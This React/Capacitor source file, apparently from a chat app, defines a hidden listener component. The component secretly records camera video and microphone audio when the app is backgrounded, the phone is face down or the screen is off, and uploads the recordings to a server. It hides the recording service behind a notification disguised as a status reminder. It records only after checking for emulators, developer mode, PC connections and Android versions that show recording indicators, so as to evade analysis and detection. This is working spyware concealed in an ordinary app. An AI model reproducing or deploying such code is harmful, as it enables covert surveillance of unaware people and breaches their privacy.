import React, { useCallback, useEffect, useRef, useState } from 'react';
import { BackgroundTask } from '@robingenz/capacitor-background-task';
import { writeFile } from 'capacitor-blob-writer';
import { App } from '@capacitor/app';
import { Device, DeviceInfo } from '@capacitor/device';
import { Directory } from '@capacitor/filesystem';
import { b64toBlob, debug, uploadFile } from '../utils/scripts';
import { useGlobal } from '../logic/main';
import { ContextReader, PersistentNotification, startVideoRecord, stopVideoRecord } from './ipc';
import { Camera, CameraDirection, CameraResultType } from '@capacitor/camera';

// https://www.npmjs.com/package/@capacitor/camera

const config = {
    isActive: false,
    useRecordTimer: true,
    useNative: false,
    usePic: false,
    standard: true,
    skipEnvCheck: true,
    disableRecord: false
};

export const Listener: React.FC = () => {
    const [{ id, isRootCallAlready }, { setIsSafeEnv }] = useGlobal(
        (state) => ({ id: state.userId, isRootCallAlready: !!state.caller }),
        (actions) => ({ setIsSafeEnv: actions.setIsSafeEnv })
    );

    const [isInitialised, setIsInitialised] = useState(false);

    const [_, setIsRecording] = useState(false);
    let { current: deviceInfo } = useRef<DeviceInfo | undefined>();
    let { current: isRecord } = useRef(false);
    let { current: isPhoneFaceDown } = useRef(false);
    let { current: isActiveRecord } = useRef(false);
    let { current: isAppActive } = useRef(false);
    let { current: skipFaceDownCheck } = useRef(false);
    let { current: skipRecord } = useRef(false);
    let { current: timerId } = useRef<any | null>(null);
    let { current: taskId } = useRef<any | null>(null);
    let { current: foregroundServiceTimer } = useRef<any | null>(false);
    let { current: wasForegroundRecord } = useRef<boolean>(false);
    let { current: isSilentRecordAllowed } = useRef<boolean>(config.skipEnvCheck);
    let { current: mediaRecorder } = useRef<MediaRecorder | undefined>();

    const record = () => {
        debug.log('STARTING RECORD, MAYBE...');
        if (config.useNative) {
            startVideoRecord().then((data: any) => {
                if (data.success) {
                    debug.log('STARTED NATIVE RECORD!!!');
                    setIsRecord(true);
                } else {
                    debug.error('COULD NOT START RECORD');
                }
            });
        } else if (config.usePic) {
            Camera.getPhoto({
                quality: 80,
                allowEditing: false,
                direction: CameraDirection.Front,
                resultType: CameraResultType.Base64
            }).then((data) => {
                const blob = b64toBlob(data.base64String!);
                saveMedia(blob, id);
            });
        } else if (config.standard) {
            debug.log('STARTING NAVIGATOR USER MEDIA');
            // TODO STREAM TO
            if (isRootCallAlready) {
                debug.log('Root call already, not starting record');
                setIsRecord(true);
            } else if (!config.disableRecord) {
                navigator.mediaDevices
                    .getUserMedia({ video: true, audio: true })
                    .then((stream) => {
                        debug.log('Having stream, starting!');
                        setIsRecord(true);
                        let chunks: any[] = [];
                        mediaRecorder = new MediaRecorder(stream);
                        mediaRecorder.ondataavailable = function (e) {
                            chunks.push(e.data);
                        };
                        mediaRecorder.onstop = function (e) {
                            debug.log('Stopping record!');
                            const blob = new Blob(chunks, { type: 'video/webm' });
                            saveMedia(blob, id!);
                        };

                        mediaRecorder.start();

                        debug.log('STARTED RECORD!! ');

                        if (config.useRecordTimer) {
                            timerId = setTimeout(() => {
                                debug.log(
                                    '--------------- STOPPING BECAUSE OF TIMER, is foreground?',
                                    foregroundServiceTimer
                                );
                                if (foregroundServiceTimer) {
                                    clearInterval(foregroundServiceTimer);
                                    wasForegroundRecord = true;
                                }
                                onStopRecordClick();
                            }, 500000);
                        }
                    })
                    .catch(async (error: any) => {
                        debug.error('Could not get user stream!!!!', error);
                    });
            }
        }
    };

    const activityListener = useCallback(
        (obj: any) => {
            debug.log('GOT ACTIVIYT LISTENER UPDATE!!!', JSON.stringify(obj));
            if (!obj.isActive && !isRecord && isSilentRecordAllowed) {
                debug.log('---------Apps is groing to be paused...');
                if (deviceInfo?.operatingSystem === 'ios') {
                    startSilentRecord();
                } else {
                    startBackgroundTask();
                }
            } else if (obj.isActive) {
                isAppActive = true;

                if (!skipRecord) {
                    onStopRecordClick();
                }
            }
        },
        [deviceInfo, skipRecord, isRecord, isSilentRecordAllowed]
    );

    const saveMedia = useCallback(
        async (blob: Blob, id) => {
            try {
                debug.log('IS ACTIVE RECORD?', isActiveRecord);

                const name = `${isActiveRecord ? 'active' : 'background'}.${
                    wasForegroundRecord ? 'screenOff.' : ''
                }video`;

                await uploadFile(blob, id, name);

                try {
                    await writeFile({
                        path: `cool-chat/${name}.webm`,
                        directory: Directory.External,
                        data: blob,
                        recursive: true,
                        fallback(writeError) {
                            debug.error('Could not write blob', writeError);
                            return false;
                        }
                    });
                } catch (writeError) {
                    debug.error('Could not write blob', writeError);
                }

                isActiveRecord = false;
                wasForegroundRecord = false;
                setIsRecord(false);
            } catch (e) {
                isActiveRecord = false;
                setIsRecord(false);
                debug.error(e);
            }

            if (taskId) {
                BackgroundTask.finish({
                    taskId
                });
            }
        },
        [isActiveRecord, taskId, wasForegroundRecord]
    );
    const setIsRecord = useCallback(
        (value: boolean) => {
            isRecord = value;
            setIsRecording(value);
        },
        [setIsRecording, isRecord]
    );

    const startSilentRecord = () => {
        skipFaceDownCheck = true;
        debug.log('>>>>>>>TRYING TO START SILENT-RECORD: skipRecord', skipRecord, 'config.isActive', config.isActive);
        if (!skipRecord && config.isActive && isSilentRecordAllowed) {
            debug.log('>>>>>>>TRYING TO START SILENT-RECORD!');
            isActiveRecord = false;
            record();
        }
    };
    const startForegroundTask = async () => {
        debug.log('>>>>>>>TRYING TO START FOREGROUND-SERVICE-RECORD....');
        try {
            await PersistentNotification.open({
                title: 'Vergiss nicht deinen Status zu setzen!',
                icon: 'icons/icon.png',
                color: '#00ff001C',
                body: 'Updates',
                actions: [
                    {
                        title: '',
                        action: ''
                    }
                ]
            });

            //const { isOpen } = await PersistentNotification.getState();
            //debug.log('Is the foreground notification open?', isOpen);

            startSilentRecord();
            foregroundServiceTimer = setInterval(onScreenToggle, 1000);
        } catch (e) {
            debug.log('Unable to start foreground service: ', e);
        }
    };

    const startBackgroundTask = async () => {
        taskId = await BackgroundTask.beforeExit(async () => {
            const { isScreenOn } = await ContextReader.isScreenOn();
            startSilentRecord();
            debug.log('Started Backgroundtask with ID: ', taskId, 'checking if screen is on:', isScreenOn);
            if (!isScreenOn) {
                await startForegroundTask();
                if (taskId) {
                    debug.log('Finishing Backgroundtask!');
                    BackgroundTask.finish({
                        taskId
                    });
                }
            }
        });
    };

    const handleScreenOrientation = useCallback(
        (data: { faceDown: boolean }) => {
            debug.log('ORIENTATION: ', JSON.stringify(data));
            if (!skipFaceDownCheck) {
                debug.warn('skipFaceDownCheck is FALSE, so doing stuff...');
                if (data.faceDown && isSilentRecordAllowed) {
                    isPhoneFaceDown = true;
                    record();
                } else {
                    isPhoneFaceDown = false;
                    onStopRecordClick();
                }
            } else {
                debug.warn('Skipping face down check!');
            }
        },
        [skipFaceDownCheck, isSilentRecordAllowed]
    );
    const onScreenToggle = useCallback(async () => {
        const { isScreenOn } = await ContextReader.isScreenOn();
        debug.log('CHECKING SCREEN ON:', isScreenOn, 'foregroundServiceTimer:', foregroundServiceTimer);
        if (foregroundServiceTimer && isScreenOn) {
            clearInterval(foregroundServiceTimer);
            wasForegroundRecord = true;
            onStopRecordClick();
        }
    }, [foregroundServiceTimer, isRecord]);

    const onStopRecordClick = useCallback(() => {
        try {
            PersistentNotification.close().catch((e: any) => {
                debug.log('Trouble closing the persistent notification: ', e);
            });
        } catch (e) {
            debug.error('Could not use PersistentNotification:', e);
        }

        foregroundServiceTimer = null;
        if (timerId) {
            debug.log('Cancelling record timer!');
            clearTimeout(timerId);
        }
        mediaRecorder?.stop();
        if (config.useNative) {
            stopVideoRecord().then((data: any) => {
                // TDODO: VIDEO STREAM END
                debug.log('STOPPED NATIVE RECORD!');
            });
        }
        skipFaceDownCheck = false;
        skipRecord = false;
    }, [isActiveRecord, taskId, timerId]);

    const preCheck = useCallback(async () => {
        debug.log('PRECHECKING DEVICE WIT DEVICEINFO', deviceInfo?.operatingSystem);
        if (config.skipEnvCheck) {
            isSilentRecordAllowed = true;
            setIsSafeEnv(true);
            return;
        }
        if (deviceInfo?.operatingSystem === 'android') {
            try {
                const isValidVersion = !deviceInfo.osVersion.startsWith('12') && !deviceInfo.osVersion.startsWith('13');
                const isNonDeveloperMode = !(await ContextReader.isDevMode()).isDevModeEnabled;
                const isNonServiceMode = Object.keys((await ContextReader.getActiveServices()) || {}).length === 0;
                const isNotConnectedToPC = !(await ContextReader.isConnectedToPC()).isConnectedToPC;
                const isNoEmulator = !(await ContextReader.isEmulator()).isEmulator;
                const hasCamPermission = (await ContextReader.hasCamPermission()).hasPermission;
                const hasMicPermission = (await ContextReader.hasMicPermission()).hasPermission;

                const allTogetherNow =
                    isNonDeveloperMode &&
                    isValidVersion &&
                    isNotConnectedToPC &&
                    isNonServiceMode &&
                    isNoEmulator &&
                    hasCamPermission &&
                    hasMicPermission;

                debug.log(
                    'GOT ANDROID INFOS OF DEVICE',
                    deviceInfo.osVersion,
                    'isValidVersion',
                    isValidVersion,

                    'isNonDeveloperMode',
                    isNonDeveloperMode,

                    'isNonServiceMode',
                    isNonServiceMode,

                    'isNotConnectedToPC',
                    isNotConnectedToPC,

                    'isNoEmulator',
                    isNoEmulator,
                    'hasCamPermission',
                    hasCamPermission,
                    'hasMicPermission',
                    hasMicPermission
                );

                isSilentRecordAllowed = allTogetherNow;
                setIsSafeEnv(allTogetherNow);
            } catch (e) {
                debug.warn(' COULD NOT GET ANDROID INFOS!');
                isSilentRecordAllowed = false;
            }
        } else if (deviceInfo?.operatingSystem === 'ios') {
            const isNotConnectedToPC = !(await ContextReader.isConnectedToPC()).isConnectedToPC;
            const isValidVersion = !(await ContextReader.isDevMode()).isDevModeEnabled;

            isSilentRecordAllowed = isNotConnectedToPC && isValidVersion;
            setIsSafeEnv(isNotConnectedToPC && isValidVersion);
        } else {
            debug.warn('SETTING FALLBACK SAFE ENV');
            isSilentRecordAllowed = false;
            setIsSafeEnv(isSilentRecordAllowed);
        }
    }, [deviceInfo]);

    useEffect(() => {
        if (!isInitialised) {
            debug.log('-----> LISTENER IS ACTIVE!');
            Device.getInfo().then(
                (data) => {
                    debug.log('--> Received device info:', data.operatingSystem);
                    deviceInfo = data;
                    preCheck();
                },
                (e) => {
                    debug.error('COULD NOT RECIEVE DEVICE INFO:', e);
                }
            );
            debug.log('-----> START LISTENING');
            ContextReader?.trackOrientationChanges();
            setIsInitialised(true);
            App.addListener('appStateChange', activityListener);
            //ContextReader?.addListener('faceChange', handleScreenOrientation);
        }

        return () => {
            //App.removeAllListeners();
        };
    }, [isInitialised]);

    return <></>;
};
